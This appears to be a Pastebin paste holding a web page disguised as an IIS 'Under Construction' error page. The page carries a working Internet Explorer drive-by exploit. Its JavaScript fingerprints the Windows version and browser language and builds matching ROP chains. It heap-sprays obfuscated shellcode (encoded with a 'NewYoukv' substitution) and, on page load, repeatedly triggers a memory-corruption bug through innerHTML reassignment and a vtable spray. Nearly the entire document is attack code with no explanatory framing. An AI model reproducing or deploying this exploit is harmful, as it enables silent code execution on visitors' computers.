Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Hax0rFunT1me !!
- <HTML>
- <head>
- <meta HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
- <title ID=titletext>Under Construction</title>
- </head>
- <SCRIPT LANGUAGE="JavaScript">
- function FINGERPRINT_IE()
- {
- this.UNKNOWN = -1;
- this.WINDOWS_XP = 1;
- this.WINDOWS_2003 = 2;
- this.WINDOWS_VISTA = 3;
- this.WINDOWS_7 = 4;
- this.EN=5;
- this.ZH=6;
- this.FR=7;
- this.DE=8;
- this.JA=9;
- this.PT=10;
- this.KO=11;
- this.RU=12;
- this.isie = function()
- {
- if( navigator.appName != 'Microsoft Internet Explorer' || navigator.userAgent.indexOf( 'MSIE' ) < 0 )
- return false;
- return true;
- };
- this.platform = function()
- {
- if( navigator.userAgent.indexOf( 'Windows NT 5.1' ) > -1 )
- return this.WINDOWS_XP;
- else if( navigator.userAgent.indexOf( 'Windows NT 5.2' ) > -1 )
- return this.WINDOWS_2003;
- else if( navigator.userAgent.indexOf( 'Windows NT 6.0' ) > -1 )
- return this.WINDOWS_VISTA;
- else if( navigator.userAgent.indexOf( 'Windows NT 6.1' ) > -1 )
- return this.WINDOWS_7;
- return this.UNKNOWN;
- };
- this.tarLanguage=function()
- {
- var language;
- if(navigator.appName=='Netscape')
- language=navigator.language;
- else
- language=navigator.browserLanguage;
- if(language.indexOf('en')>-1)
- return this.EN;
- else if(language.indexOf('zh')>-1)
- return this.ZH;
- else if (language.indexOf('fr') > -1)
- return this.FR;
- else if (language.indexOf('de') > -1)
- return this.DE;
- else if (language.indexOf('ja') > -1)
- return this.JA;
- else if (language.indexOf('pt') > -1)
- return this.PT;
- else if(language.indexOf('ko') > -1)
- return this.KO;
- else if(language.indexOf('ru') > -1)
- return this.RU;
- else
- return alert(language);
- };
- }
- function dup_str(str, length) {
- var res = str;
- while(res.length < length) {
- res += res;
- }
- res = res.substr(res.length - length);
- return res;
- }
- function to_bin(str) {
- var res = "";
- while(str.length > 0) {
- var first = str.substr(0, 2);
- var second = str.substr(2, 2);
- res += "%u" + second + first;
- str = (str.length > 4) ? str.substr(4) : "";
- }
- return unescape(res);
- }
- var arr=[];
- function ManAndWoman()
- {
- var ie=new FINGERPRINT_IE();
- var platform = ie.platform();
- var tarLanguage=ie.tarLanguage();
- var adjustEsp= dword2data(0x645b186a)+
- dword2data(0x638b1b8b)+
- dword2data(0x9090fc08);
- var vbc =("NewYoukv10EBNewYoukv4B5BNewYoukvC933NewYoukvB966NewYoukv0171NewYoukv3480NewYoukv110BNewYoukvFAE2NewYoukv05EBNewYoukvEBE8NewYoukvFFFFNewYoukvF8FFNewYoukv1013NewYoukv1111NewYoukv754E"+
- "NewYoukv21B0NewYoukv1111NewYoukv9A11NewYoukv1D51NewYoukv619ANewYoukvBC0DNewYoukv799ANewYoukv9A19NewYoukv7BE6NewYoukv4817NewYoukvB3F9NewYoukv1111NewYoukvF311NewYoukv51E8NewYoukv2991"+
- "NewYoukv64D2NewYoukv98EBNewYoukv0D57NewYoukv7E79NewYoukv117FNewYoukv7911NewYoukv6364NewYoukv7C7DNewYoukvCD9ANewYoukv01FANewYoukvEE42NewYoukv0D67NewYoukvEE9ANewYoukv9A44NewYoukv9AFD"+
- "NewYoukv9C07NewYoukv1443NewYoukvF3EENewYoukvFAF9NewYoukvEEEENewYoukv4BEENewYoukv444BNewYoukvF99ANewYoukv7BF9NewYoukv1111NewYoukv4C11NewYoukvFD90NewYoukv1011NewYoukv1111NewYoukvCD9A"+
- "NewYoukv7942NewYoukv1011NewYoukv1111NewYoukv47EENewYoukv9815NewYoukv314FNewYoukv15D6NewYoukv7D12NewYoukv767ENewYoukvD63FNewYoukv1255NewYoukv7615NewYoukv7778NewYoukv2211NewYoukv41D1"+
- "NewYoukv4241NewYoukvC79ANewYoukvD392NewYoukv4339NewYoukvEE41NewYoukv0947NewYoukvD122NewYoukv05FANewYoukvEE41NewYoukv3167NewYoukv67EENewYoukv9A0DNewYoukv44EENewYoukvFD9ANewYoukv479A"+
- "NewYoukv9C19NewYoukv1443NewYoukvF3EENewYoukvF6F9NewYoukvEEEENewYoukv79EENewYoukv12F9NewYoukv1111NewYoukv47EENewYoukvEE01NewYoukv3167NewYoukv47EENewYoukv901DNewYoukv15D5NewYoukv1113"+
- "NewYoukv2211NewYoukv40D8NewYoukv47EENewYoukv4005NewYoukv9A47NewYoukv2D64NewYoukv659ANewYoukv693FNewYoukvE412NewYoukv9A47NewYoukv3167NewYoukvE412NewYoukvD822NewYoukv5058NewYoukv12BC"+
- "NewYoukv22D4NewYoukv1ECANewYoukv01AFNewYoukvC72BNewYoukv1965NewYoukvDAD0NewYoukv121CNewYoukv51CBNewYoukvE0FANewYoukv0E2ANewYoukvF664NewYoukv9A4FNewYoukv354FNewYoukvCC12NewYoukv9A77"+
- "NewYoukv5A1DNewYoukv4F9ANewYoukv120DNewYoukv9ACCNewYoukv9A15NewYoukvD412NewYoukv4FBANewYoukvD248NewYoukvE8F9NewYoukvEEEFNewYoukv9FEENewYoukv1F5FNewYoukv22FDNewYoukv9BDBNewYoukv894A"+
- "NewYoukv9BEFNewYoukv341FNewYoukvEEA1NewYoukvA1D3NewYoukv3C58NewYoukv6FCANewYoukvF3C9NewYoukv2762NewYoukv3E0BNewYoukv2061NewYoukv2223NewYoukv2425NewYoukv2627NewYoukv2829NewYoukv1121NewYoukv7911NewYoukv6565NewYoukv2B61NewYoukv3E3ENewYoukv2020NewYoukv3F22NewYoukv2120NewYoukv233FNewYoukv2025NewYoukv233FNewYoukv2822NewYoukv7B3ENewYoukv6770NewYoukv6670NewYoukv743FNewYoukv7469NewYoukv1111NewYoukv1111NewYoukv1111NewYoukv1111NewYoukv1111NewYoukv1111NewYoukv1111NewYoukv1111NewYoukv1111NewYoukv1111NewYoukv1111NewYoukv1111NewYoukv1111NewYoukv1111NewYoukv1111");
- var xbc=vbc.replace(/NewYoukv/g,"%u");
- var gjb=unescape(xbc);
- var rop_stack="";
- if( platform == ie.WINDOWS_7 || platform == ie.WINDOWS_VISTA)
- {
- rop_stack= dword2data(0x7c34bc93)+
- dword2data(0x7c34bc93)+
- dword2data(0x7c343860)+
- dword2data(0x00000001)+
- dword2data(0x7c344efe)+
- dword2data(0x00001000)+
- dword2data(0x7c35f1fb)+
- dword2data(0x00000040)+
- dword2data(0x7c341137)+
- dword2data(0x7c346c0b)+
- dword2data(0x7c36277b)+
- dword2data(0x7c3415a2)+
- dword2data(0x7c373b3d)+
- dword2data(0x7c37a0a5)+
- dword2data(0x7c378c81)+
- dword2data(0x7c345c30);
- while(rop_stack.length < (0x6c/2))
- {
- rop_stack+=dword2data(0x90909090);
- }
- rop_stack+=dword2data(0x04eb9090);
- rop_stack+=dword2data(0x7c348b05);
- }
- else if( platform == ie.WINDOWS_XP )
- {
- var dllBase;//iertutil.dll
- var insOff=0xFD5A8;
- var insOff2=0xBA108;
- var kernelBase=0x7c800000;//kernel32.dll
- var kerOff1=0x7BF37;
- var kerOff2=0x9AF1;
- var kerOff3=0xE034;
- var kerOff4=0x7F436;
- var kerOff5=0x36A08;
- var kerOff6=0x6CFC3;
- var kerOff7=0x1BC81;
- if(tarLanguage == ie.EN)
- {
- dllBase=0x3dfd0000;
- }
- else if(tarLanguage == ie.ZH)
- {
- dllBase=0x3eab0000;
- }
- else if(tarLanguage == ie.JA)
- {
- dllBase=0x40930000;
- }
- else if(tarLanguage == ie.KO)
- {
- dllBase=0x3f8d0000;
- kernelBase=0x7c7d0000;
- }
- else if(tarLanguage == ie.DE)
- {
- dllBase=0x40f50000;
- }
- else if(tarLanguage == ie.FR)
- {
- dllBase=0x40b40000;
- }
- else if(tarLanguage == ie.RU)
- {
- dllBase=0x40080000;
- }
- else if(tarLanguage == ie.PT)
- {
- dllBase=0x400f0000;
- }
- rop_stack= dword2data(kernelBase+kerOff1)+
- dword2data(kernelBase+kerOff2)+
- dword2data(kernelBase+kerOff3)+
- dword2data(0x00000040)+
- dword2data(0x00000001)+
- dword2data(kernelBase+kerOff4)+
- dword2data(0x41414141)+
- dword2data(0x00001000)+
- dword2data(0x90909090)+
- dword2data(kernelBase+kerOff5)+
- dword2data(kernelBase+kerOff6)+
- dword2data(kernelBase+kerOff7)+
- dword2data(dllBase+insOff);
- while(rop_stack.length < (0x6c/2))
- {
- rop_stack+=dword2data(0x90909090);
- }
- rop_stack+=dword2data(0x04eb9090);
- rop_stack+=dword2data(dllBase+insOff2);
- }
- rop_stack+=adjustEsp;
- rop_stack+=gjb;
- var memory_layout= dword2data(0xDEADBEE1)+
- dword2data(0xDEADBEE2)+
- dword2data(0xDEADBEE3)+
- dword2data(0xDEADBEE4)+
- dword2data(0xDEADBEE5)+
- dword2data(0xDEADBEE6)+
- dword2data(0xDEADBEE7)+
- dword2data(0xDEADBEE8)+
- dword2data(0xDEADBEE9);
- var code=rop_stack;
- var nops=unescape('%u9'+'090'+'%u9'+'090');
- while(nops.length < 0x80000)
- {
- nops+=nops;
- }
- var offset=nops.substring(0,0x5f4-memory_layout.length);
- var blockItem=memory_layout+offset+code+nops.substring(0,0x800-0x5f4-code.length);
- while(blockItem.length < 0x40000)
- {
- blockItem+=blockItem;
- }
- var block_shell=blockItem.substring(0,(0x80000-6)/2);
- for(var i=1;i<0x1c2;++i)
- {
- arr[i]=block_shell.substring(0,block_shell.length);
- }
- }
- </SCRIPT>
- <BODY>
- <DIV id=testfaild>
- <img id="imgTest" style="display:none">
- <a href="javascript:OnTest();" id="MyA" onClick="OnTest();">
- <div style="background-color:#FFFFFF; width:3000; height:4000" id="imgTest" src="" onMouseOver="OnTest2();" onMouseOut="OnTest2();"> </div>
- </a>
- </DIV>
- <SCRIPT LANGUAGE="JavaScript">
- function dword2data( dword )
- {
- var d = Number( dword ).toString( 16 );
- while( d.length < 8 )
- d = '0' + d;
- return unescape( '%u' + d.substr( 4, 8 ) + '%u' + d.substr( 0, 4 ) );
- }
- function OnTest()
- {
- var tag=0x0c0c0c0c;
- var vtable1 = dword2data( tag ) + '1234567555555555588888888';
- var divs = new Array();
- for( var i=0 ; i<128; i++ )
- divs.push( document.createElement( 'div' ) );
- Math.atan2(0xbabe,"trigger before!!!");
- testfaild.innerHTML = testfaild.innerHTML;
- Math.atan2(0xbabe,"trigger before 222!!!");
- divs[0].className = vtable1;
- divs[1].className = vtable1;
- divs[2].className = vtable1;
- divs[3].className = vtable1;
- }
- function OnTest2()
- {
- eval("imgTest").src="";
- }
- function triggerFunc()
- {
- var x=document.getElementsByTagName("div");
- var fireOnThis=document.getElementById("MyA");
- if(document.createEvent)
- {
- evObj=document.createEvent('MouseEvents');
- evObj.iniEvent('click',true,false);
- fireOnThis.dispatchEvent(evObj);
- }
- else if(document.createEventObject)
- {
- x[1].fireEvent('onMouseOver');
- fireOnThis.fireEvent('onclick');
- x[1].fireEvent('onMouseOut');
- }
- setTimeout("triggerFunc();",1000);
- }
- setTimeout("triggerFunc();",1000);
- ManAndWoman();
- </SCRIPT>
- <body bgcolor=white>
- <table>
- <tr>
- <td ID=tableProps width=70 valign=top align=center>
- <img ID=pagerrorImg src="pagerror.gif" width=36 height=48>
- <td ID=tablePropsWidth width=400>
- <h1 ID=errortype style="font:14pt/16pt verdana; color:#4e4e4e">
- <P ID=Comment1><!--Problem--><P ID="errorText">Under Construction</h1>
- <P ID=Comment2><!--Probable causes:<--><P ID="errordesc"><font style="font:9pt/12pt verdana; color:black">
- The site you are trying to view does not currently have a default page. It may be in the process of being upgraded and configured.
- <P ID=term1>Please try this site again later. If you still experience the problem, try contacting the Web site administrator.
- <hr size=1 color="blue">
- <P ID=message1>If you are the Web site administrator and feel you have received this message in error, please see "Enabling and Disabling Dynamic Content" in IIS Help.
- <h5 ID=head1>To access IIS Help</h5>
- <ol>
- <li ID=bullet1>Click <b>Start</b>, and then click <b>Run</b>.
- <li ID=bullet2>In the <b>Open</b> text box, type <b>inetmgr</b>. IIS Manager appears.
- <li ID=bullet3>From the <b>Help</b> menu, click <b>Help Topics</b>.
- <li ID=bullet4>Click <b>Internet Information Services</b>.</ol>
- </td>
- </tr>
- </table>
- </BODY>
- </HTML>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement